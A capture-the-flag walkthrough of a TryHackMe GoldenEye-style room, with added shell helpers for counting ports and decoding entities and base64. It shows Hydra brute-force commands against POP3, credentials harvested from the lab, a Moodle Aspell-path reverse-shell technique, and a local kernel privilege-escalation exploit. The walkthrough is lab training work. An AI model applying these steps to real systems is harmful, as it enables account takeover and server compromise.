Guided:
Q: Use nmap to scan the network for all ports. How many ports are open?
A: 4
(used nmap -p- and counted only the ports reported as open, not the filtered ones)
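An added example, not from the original walkthrough, of counting scan states instead of doing it by eye: the function below reads nmap's grepable output (nmap -p- -oG - <IP>) and counts ports in one state, so filtered ports are never mistaken for open ones. The scan lines are a constructed sample, not the room's real output.

```sh
#!/bin/sh
# Count ports by state from `nmap -p- -oG -` (grepable) output.
# Added example; the SAMPLE scan below is constructed, not the real room scan.

count_ports() {
    # $1 = state to count (open|filtered|closed); grepable nmap output on stdin.
    # Port entries look like "80/open/tcp//http///", comma-separated after "Ports: ".
    awk -v want="$1" '
        /^Host:/ && /Ports:/ {
            sub(/.*Ports: /, "")                 # drop host prefix
            sub(/[ \t]+Ignored State:.*/, "")    # drop the trailing summary
            n = split($0, entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")        # port/state/proto/owner/service/...
                if (f[2] == want) c++
            }
        }
        END { print c + 0 }'
}

# Constructed sample: four open ports, two filtered, rest closed.
SAMPLE='# Nmap scan initiated (constructed sample)
Host: 10.10.10.10 ()    Status: Up
Host: 10.10.10.10 ()    Ports: 25/open/tcp//smtp///, 80/open/tcp//http///, 143/open/tcp//imap///, 55007/open/tcp//pop3///, 22/filtered/tcp//ssh///, 8080/filtered/tcp//http-proxy///    Ignored State: closed (65529)
# Nmap done'

printf '%s\n' "$SAMPLE" | count_ports open       # 4
printf '%s\n' "$SAMPLE" | count_ports filtered   # 2
```

Against a live target the same filter is `nmap -p- -oG - <IP> | count_ports open`; the "filtered" count is worth checking separately because those ports may open up from a different source address or after a slower scan.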
Q: Who needs to make sure they update their default password? A: Boris
Opened the web site on port 80 and pressed Ctrl+U to view the page source, which links to "terminal.js". That script holds Boris's default password encoded as HTML entities.
Q: What's their password?
A: InvincibleHack3r
(decoded the entities with an online decoder)
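An added example, not part of the original writeup, that does the entity decoding offline instead of in a browser tool: a small awk filter that turns decimal numeric entities (&#NNN;) back into text. The sample line is constructed to encode the password found above; the real terminal.js layout may differ.

```sh
#!/bin/sh
# Decode decimal HTML numeric entities (&#NNN;) offline.
# Added example; SAMPLE is constructed, not copied from the page source.

html_entity_decode() {
    # Reads text on stdin; replaces each &#NNN; with the character of that code,
    # leaves everything else untouched. Decimal entities only (no &#x..;, no &amp;),
    # and ASCII code points only, since awk's %c is byte-oriented.
    awk '{
        line = $0; out = ""
        while (match(line, /&#[0-9]+;/)) {
            code = substr(line, RSTART + 2, RLENGTH - 3) + 0   # "+ 0" forces numeric for %c
            out = out substr(line, 1, RSTART - 1) sprintf("%c", code)
            line = substr(line, RSTART + RLENGTH)
        }
        print out line
    }'
}

# Constructed sample: the password as decimal entities (I=73, n=110, v=118, ...).
SAMPLE='boris default password: &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;'

printf '%s\n' "$SAMPLE" | html_entity_decode
```

Pipe the real file through it with `curl -s http://<IP>/terminal.js | html_entity_decode` to see every entity-encoded string at once rather than one pasted snippet.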
Q: If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?
A: secret1!
Used telnet to connect to POP3 on port 55007;
boris:InvincibleHack3r
didn't work, but at least the username was right, so time for brute force:
hydra -l boris -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
(-t 50 is aggressive for a single POP3 service; lower it if the server starts dropping connections)
Q: Inspect port 55007, which service is configured to use this port?
A: POP3 (telnet was only the client used to talk to it)
Q: What can you find on this service?
A: emails
Q: What user can break Boris' codes?
A: Natalya
(mentioned in the web site source and in the emails)
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
Reveals
natalya:bird
natalya's email reveals this:
username: xenia
password: RCP90rulez!
And if you didn't have the URL on our internal domain: severnaya-station.com/gnocertdir
(map that hostname to the target IP in /etc/hosts before browsing to it)
Q: Try using the credentials you found earlier. Which user can you login as?
A: xenia
Q: Have a poke around the site. What other user can you find?
A: doak
Going to
http://severnaya-station.com/gnocertdir
with xenia's creds, then
My profile
-> Messages
reveals a message from Dr_doak:
"My email username is... doak"
Q: What was this user's password?
A: goat
hydra -l doak -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
Q: What is the next user you can find from doak?
A: dr_doak
(revealed in doak's email)
Q: What is this user's password?
A: 4England!
Login as user doak, go to
My profile
-> My private files
-> for james
and download the file "s3cret.txt".
s3cret.txt reveals /dir007key/for-007.jpg,
so I went to the full link -> http://severnaya-station.com/dir007key/for-007.jpg
-> Download the image and extract its metadata (an online extractor was used here; exiftool does the same offline).
The Exif data reveals a base64 hidden message: eFdpbnRlcjE5OTV4IQ==
echo eFdpbnRlcjE5OTV4IQ== | base64 -d
-> xWinter1995x!
It was the web site's admin password: admin:xWinter1995x!
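Added example, not from the original writeup: rather than eyeballing one metadata field, scan every exiftool value for a well-formed base64 string that decodes to printable text. The metadata dump below is constructed, and the field name "Image Description" is an assumption about where the string sits.

```sh
#!/bin/sh
# Find base64-encoded strings hidden in image metadata.
# Added example; SAMPLE is a constructed exiftool-style dump, not real tool output.

decode_b64_fields() {
    # Reads "Tag   : Value" lines on stdin (exiftool's default layout) and prints
    # "Tag -> decoded" for every value that is valid base64 AND decodes to printable text.
    while IFS= read -r line; do
        case "$line" in *": "*) ;; *) continue ;; esac
        tag=$(printf '%s' "${line%%:*}" | sed 's/[[:space:]]*$//')
        value=${line#*: }
        case "$value" in
            "" | *[!A-Za-z0-9+/=]*) continue ;;       # outside the base64 alphabet
        esac
        [ $(( ${#value} % 4 )) -eq 0 ] || continue    # base64 length is a multiple of 4
        decoded=$(printf '%s' "$value" | base64 -d 2>/dev/null) || continue
        case "$decoded" in
            "" | *[![:print:]]*) continue ;;          # short words like "JPEG" decode to junk
        esac
        printf '%s -> %s\n' "$tag" "$decoded"
    done
}

# Constructed sample; "Image Description" as the carrier field is an assumption.
SAMPLE='ExifTool Version Number         : 12.40
File Name                       : for-007.jpg
File Type                       : JPEG
Image Description               : eFdpbnRlcjE5OTV4IQ==
Image Width                     : 1024
Image Height                    : 768'

printf '%s\n' "$SAMPLE" | decode_b64_fields
```

On the real file this is `exiftool for-007.jpg | decode_b64_fields`; the printable-text check matters because many short plain values ("JPEG", "1024") are technically valid base64.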
Login as admin; THM hinted to look for the "Aspell" plugin.
There is a search bar at the bottom left of the admin pages. Searching for 'spell' finds the "Spell engine" setting, which should be changed from 'Google Spell' to 'PSpellShell', and 'Path to aspell' set to the reverse shell command (THM hinted it should be a Python one, from the pentestmonkey reverse shell cheat sheet). The command runs on the server the next time a spell check is triggered from the editor.
Opened an nc listener and got a connection back as user www-data.
THM suggested downloading and transferring linuxprivchecker;
honestly, uname -a is all that was needed for the next question.
Q: Whats the kernel version?
A: 3.13.0-32-generic
THM pointed to the kernel exploit for this version.
The target didn't have "gcc" to compile it, but it did have "cc". The exploit also invokes gcc itself while running, so besides compiling with cc, the only tweak needed was to open the source and change gcc
-> cc
Upload to the target, compile the exploit, run it... and:
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Get root's flag and open the last link in it -> http://severnaya-station.com/006-final/xvf7-flag/